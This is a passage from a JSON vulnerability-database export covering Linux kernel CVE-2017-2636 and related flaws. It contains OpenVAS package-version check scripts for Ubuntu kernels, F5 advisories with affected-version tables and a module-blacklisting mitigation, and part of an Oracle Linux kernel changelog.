N_HDLC\n line discipline implementation in the Linux kernel contained a double-free\n vulnerability. A local attacker could use this to cause a denial of service\n (system crash) or possibly gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-aws on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3220-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3220-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1007-aws\", ver:\"4.4.0-1007.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1007.8\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T12:58:19", "references": ["3218-1", "http://www.ubuntu.com/usn/usn-3218-1/"], "pluginID": "1361412562310843077", "description": "The remote host is missing an update for the ", "edition": 7, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-03-08T00:00:00", "title": "Ubuntu Update for linux USN-3218-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2636"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310843077", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843077", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3218-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843077\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 05:53:16 +0100 (Wed, 08 Mar 2017)\");\n script_cve_id(\"CVE-2017-2636\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3218-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Alexander Popov discovered that the N_HDLC\n line discipline implementation in the Linux kernel contained a double-free\n vulnerability. A local attacker could use this to cause a denial of service\n (system crash) or possibly gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3218-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3218-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-124-generic\", ver:\"3.2.0-124.167\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-124-generic-pae\", ver:\"3.2.0-124.167\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-124-highbank\", ver:\"3.2.0-124.167\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-124-omap\", ver:\"3.2.0-124.167\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-124-powerpc-smp\", ver:\"3.2.0-124.167\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-124-powerpc64-smp\", ver:\"3.2.0-124.167\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-124-virtual\", ver:\"3.2.0-124.167\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1502-omap4\", ver:\"3.2.0-1502.129\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.2.0.124.139\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-pae\", ver:\"3.2.0.124.139\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-highbank\", ver:\"3.2.0.124.139\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-omap\", ver:\"3.2.0.124.139\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-omap4\", ver:\"3.2.0.1502.97\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.2.0.124.139\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.2.0.124.139\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-virtual\", ver:\"3.2.0.124.139\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T12:58:03", "references": ["http://www.ubuntu.com/usn/usn-3220-1/", "3220-1"], "pluginID": "1361412562310843078", "description": "The remote host is missing an update for the ", "edition": 7, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-03-08T00:00:00", "title": "Ubuntu Update for linux USN-3220-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2636"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310843078", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843078", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3220-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843078\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 05:53:17 +0100 (Wed, 08 Mar 2017)\");\n script_cve_id(\"CVE-2017-2636\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3220-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Alexander Popov discovered that the N_HDLC\n line discipline implementation in the Linux kernel contained a double-free\n vulnerability. A local attacker could use this to cause a denial of service\n (system crash) or possibly gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3220-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3220-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1005-gke\", ver:\"4.4.0-1005.6\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1046-raspi2\", ver:\"4.4.0-1046.53\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1050-snapdragon\", ver:\"4.4.0-1050.54\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-66-generic\", ver:\"4.4.0-66.87\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-66-generic-lpae\", ver:\"4.4.0-66.87\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-66-lowlatency\", ver:\"4.4.0-66.87\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-66-powerpc-e500mc\", ver:\"4.4.0-66.87\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-66-powerpc-smp\", ver:\"4.4.0-66.87\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-66-powerpc64-emb\", ver:\"4.4.0-66.87\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-66-powerpc64-smp\", ver:\"4.4.0-66.87\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.66.70\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.66.70\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.4.0.1005.5\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.66.70\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.66.70\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.66.70\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.66.70\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.66.70\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1046.45\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1050.42\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2018-07-31T18:03:39", "references": [], "description": "\nF5 Product Development has assigned CPF-24929 and CPF-24930 (Traffix SDC) to this vulnerability.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>).\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 13.x | None | Not applicable | Not vulnerable | None | None \n12.x | None | Not applicable \n11.x | None | Not applicable \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | None | Not applicable | Not vulnerable | None | None \nBIG-IQ Centralized Management | 6.x | None | Not applicable | Not vulnerable | None | None \n5.x | None | Not applicable \n4.x | None | Not applicable \nBIG-IQ Cloud and Orchestration | 1.x | None | Not applicable | Not vulnerable | None | None \nF5 iWorkflow | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | High | [8.8](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H>) | Linux kernel \n4.x | 4.4.0 | None \n \n1 The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "reporter": "f5", "published": "2018-07-31T17:24:00", "title": "Linux kernel vulnerability CVE-2016-8650", "type": "f5", "enchantments": {"score": {"modified": "2018-07-31T18:03:39", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2016-8650"], "modified": "2018-07-31T17:24:00", "id": "F5:K46394694", "href": "https://support.f5.com/csp/article/K46394694", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-10T01:56:16", "references": [], "edition": 1, "description": "\nF5 Product Development has assigned IDs 651243 and 651245 (BIG-IP), ID 651300 (BIG-IQ, iWorkflow), and ID 651295 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H18015201 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 | 13.0.1 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Medium | Linux kernel \nBIG-IP AAM | 13.0.0 \n | 13.0.1 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | Medium | Linux kernel \nBIG-IP AFM | 13.0.0 \n | 13.0.1 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | Medium | Linux kernel \nBIG-IP Analytics | 13.0.0 | 13.0.1 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Medium | Linux kernel \nBIG-IP APM | 13.0.0 | 13.0.1 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Medium | Linux kernel \nBIG-IP ASM | 13.0.0 | 13.0.1 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Medium | Linux kernel \nBIG-IP DNS | 13.0.0 | 13.0.1 \n12.0.0 - 12.1.2 | Medium | Linux kernel \nBIG-IP Edge Gateway | None | 11.2.1 | Medium | Linux kernel \nBIG-IP GTM | None | 11.4.0 - 11.6.1 \n11.2.1 | Medium | Linux kernel \nBIG-IP Link Controller | 13.0.0 | 13.0.1 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | Medium | Linux kernel \nBIG-IP PEM | 13.0.0 | 13.0.1 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | Medium | Linux kernel \nBIG-IP PSM | None | 11.4.0 - 11.4.1 | Medium | Linux kernel \nBIG-IP WebAccelerator | None | 11.2.1 | Medium | Linux kernel \nBIG-IP WebSafe | 13.0.0 | 13.0.1 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | Medium | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | None | Medium | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.1.0 | None | Medium | Linux kernel \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo confirm the status of the **n_hdlc** kernel module, you can use the **lsmod | grep -i n_hdlc **Linux command from the command line of the F5 product. If the **n_hdlc **module is loaded, output appears similar to the following example:\n\n# lsmod | grep -i n_hdlc \nn_hdlc 17455 0\n\nTo mitigate this vulnerability, you can blacklist the **n_hdlc** module to prevent accidental or intentional loading. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the F5 product as the root user.\n 2. To prevent accidental or intentional loading of the **n_hdlc **module, type the following command: \n\n\necho \"install n_hdlc /bin/true\" >> /etc/modprobe.d/disable-n_hdlc.conf\n\n 3. Optional: If the **n_hdlc** module is already loaded and in use by a process, then reboot the system.\n\nYou can also mitigate this vulnerability by permitting management access to the F5 product only over a secure network and limiting shell access to trusted users. For more information, refer to [K5380: Specifying allowable IP ranges for SSH access](<https://support.f5.com/csp/article/K5380>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "reporter": "f5", "published": "2017-03-28T21:19:00", "title": "Linux kernel vulnerability CVE-2017-2636", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "affectedSoftware": [], "bulletinFamily": "software", "cvelist": ["CVE-2017-2636"], "modified": "2018-04-09T23:39:00", "id": "F5:K18015201", "href": "https://support.f5.com/csp/article/K18015201", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:38:00", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "x86_64", "packageFilename": "kernel-3.10.0-514.16.1.el7.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "noarch", "packageFilename": "kernel-abi-whitelists-3.10.0-514.16.1.el7.noarch.rpm", "packageName": "kernel-abi-whitelists", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-3.10.0-514.16.1.el7.x86_64.rpm", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "x86_64", "packageFilename": "kernel-headers-3.10.0-514.16.1.el7.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "src", "packageFilename": "kernel-3.10.0-514.16.1.el7.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "x86_64", "packageFilename": "python-perf-3.10.0-514.16.1.el7.x86_64.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "x86_64", "packageFilename": "kernel-debug-3.10.0-514.16.1.el7.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "x86_64", "packageFilename": "kernel-devel-3.10.0-514.16.1.el7.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-libs-devel-3.10.0-514.16.1.el7.x86_64.rpm", "packageName": "kernel-tools-libs-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "noarch", "packageFilename": "kernel-doc-3.10.0-514.16.1.el7.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "x86_64", "packageFilename": "perf-3.10.0-514.16.1.el7.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "x86_64", "packageFilename": "kernel-tools-libs-3.10.0-514.16.1.el7.x86_64.rpm", "packageName": "kernel-tools-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "3.10.0-514.16.1.el7", "arch": "x86_64", "packageFilename": "kernel-debug-devel-3.10.0-514.16.1.el7.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}], "description": "- [3.10.0-514.16.1.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n- Oracle Linux RHCK Module Signing Key was compiled into kernel (olkmod_signing_key.x509)(alexey.petrenko@oracle.com)\n- Update x509.genkey [bug 24817676]\n[3.10.0-514.16.1]\n- [tty] n_hdlc: get rid of racy n_hdlc.tbuf ('Herton R. Krzesinski') [1429919 1429920] {CVE-2017-2636}\n- [md] dm rq: cope with DM device destruction while in dm_old_request_fn() (Mike Snitzer) [1430334 1412854]\n- [fs] nfs: Fix inode corruption in nfs_prime_dcache() (Benjamin Coddington) [1429514 1416532]\n- [fs] nfs: Don't let readdirplus revalidate an inode that was marked as stale (Benjamin Coddington) [1429514 1416532]\n- [block] Copy a user iovec if it includes gaps (Jeff Moyer) [1429508 1421263]\n- [kernel] percpu-refcount: fix reference leak during percpu-atomic transition (Jeff Moyer) [1429507 1418333]\n- [powerpc] eeh: eeh_pci_enable(): fix checking of post-request state (Steve Best) [1425538 1383670]\n- [s390] mm: handle PTE-mapped tail pages in fast gup (Hendrik Brueckner) [1423438 1391532]\n- [net] skbuff: Fix skb checksum partial check (Lance Richardson) [1422964 1411480]\n- [net] skbuff: Fix skb checksum flag on skb pull (Lance Richardson) [1422964 1411480]\n- [security] selinux: fix off-by-one in setprocattr (Paul Moore) [1422368 1422369] {CVE-2017-2618}\n- [virtio] 